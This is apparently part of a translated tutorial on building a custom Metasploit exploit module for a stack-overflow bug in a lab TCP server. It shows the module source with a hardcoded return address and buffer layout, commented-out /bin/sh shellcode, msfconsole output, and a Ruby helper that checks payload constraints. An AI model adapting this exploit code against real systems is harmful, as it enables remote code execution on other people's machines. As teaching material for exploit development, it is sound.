Now that we have a vulnerability, we can attack it. First we need to understand how a Metasploit exploit module is written; see in particular
http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
Metasploit itself is very powerful and will not be introduced in much detail here.
First we need to add an exploit module for this vulnerability.
We make our changes directly to the sample module:
~/.msf4/modules# mkdir exploits
~/.msf4/modules# cd exploits
~/.msf4/modules/exploits# mkdir linux
~/.msf4/modules/exploits# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb myvictim.rb
~/.msf4/modules/exploits# ls
myvictim.rb  myvictimserver.rb  proftp_sreplace.rb
Then look at myvictim.rb:
##
# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

module Msf

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sample Exploit',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in a TCP server that has a parsing bug.
      },
      'Author'         => 'skape',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Windows All
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret'      => 0x41424344
            }
          ],
        ],
      'DefaultTarget' => 0))
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends 1024 A's
  # followed by the fake return address and then the payload.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf  = "A" * 1024
    buf += [target.ret].pack('V')   # 'V' = 32-bit unsigned little-endian
    buf += payload.encoded

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end

end
Then we need to load it into Metasploit by running reload_all:
       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > reload_all
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my
The module we just added is not in the list, which means there is a problem with the module and it must be modified: the loader expects a class named Metasploit3 at the top level of the file, not the Msf::Exploits::Sample class wrapped in module Msf that the sample uses. The modified version is as follows:
# -*- coding: binary -*-
##
# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'myvictimserver',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in a TCP server that has a stack overflow bug.
      },
      'Author'         => 'Bai',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 116,
          # 'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: myvictimserver on Linux
          [
            'myvictimserver run on Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbffff4a4
            }
          ],
        ],
      'DefaultTarget' => 0))
  end

  #
  # The check method just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends a 4-byte
  # address, followed by the payload and then 100 copies of the return address.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf = ""
    # The commented-out lines are a hand-written /bin/sh shellcode that is not
    # used; the encoded Metasploit payload is sent instead.
    #buf = "\x90" *
    #buf += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    #buf += "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    #buf += "\x80\xe8\xdc\xff\xff\xff/bin/sh"
    buf += "\xa4\xf4\xff\xbf"   # 0xbffff4a4 little-endian, the same bytes as target.ret
    buf += payload.encoded
    buf += [].fill(target.ret, 0, 100).pack('V*')   # 'V' = 32-bit little-endian

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end
end
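As an added example (not code from the original post or from Metasploit), the buffer layout of the exploit method above rebuilt in plain Ruby so it can be checked offline against the module's Payload constraints; RET and SPACE are the module's own values, and the payload is a constructed stand-in rather than real shellcode.

```ruby
# Added example: the module's buffer layout and the constraint checks a
# module author runs before relying on it. RET and SPACE come from the
# module above; the payload in main is a constructed placeholder.

RET        = 0xbffff4a4   # target.ret in the module
SPACE      = 116          # 'Space' from the module's Payload hash
RET_COPIES = 100          # copies of target.ret the module appends

# Pack a 32-bit address little-endian, exactly what [target.ret].pack('V') does.
# 'v' (16-bit) would silently truncate 0xbffff4a4 to 0xf4a4.
def pack_ret(ret)
  [ret].pack('V')
end

# Same layout as the module: 4-byte address, encoded payload, then 100 copies
# of target.ret. The module hardcodes "\xa4\xf4\xff\xbf"; pack_ret(RET) yields
# the identical bytes, so the literal can be replaced by the packed address.
def build_buffer(payload, ret: RET)
  buf  = pack_ret(ret)
  buf += payload.b                                  # force binary encoding
  buf += [].fill(ret, 0, RET_COPIES).pack('V*')
  buf
end

# The payload must fit in 'Space', and neither the payload nor the return
# address may contain a bad char (the sample declared "\x00" as one).
def check_constraints(payload, ret: RET, badchars: "\x00", space: SPACE)
  problems = []
  if payload.bytesize > space
    problems << "payload is #{payload.bytesize} bytes, Space is #{space}"
  end
  badchars.each_byte do |b|
    if payload.bytes.include?(b)
      problems << format("payload contains bad char 0x%02x", b)
    end
    if pack_ret(ret).bytes.include?(b)
      problems << format("return address contains bad char 0x%02x", b)
    end
  end
  problems
end

if __FILE__ == $0
  payload = ("\xcc" * 40).b   # constructed stand-in for payload.encoded
  puts "buffer is #{build_buffer(payload).bytesize} bytes"
  problems = check_constraints(payload)
  puts(problems.empty? ? "constraints OK" : problems.join("\n"))
end
```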
Now the module can be found:
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim
use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/
msf > use exploit/linux/my
Stack overflow attack using Metasploit (part 4)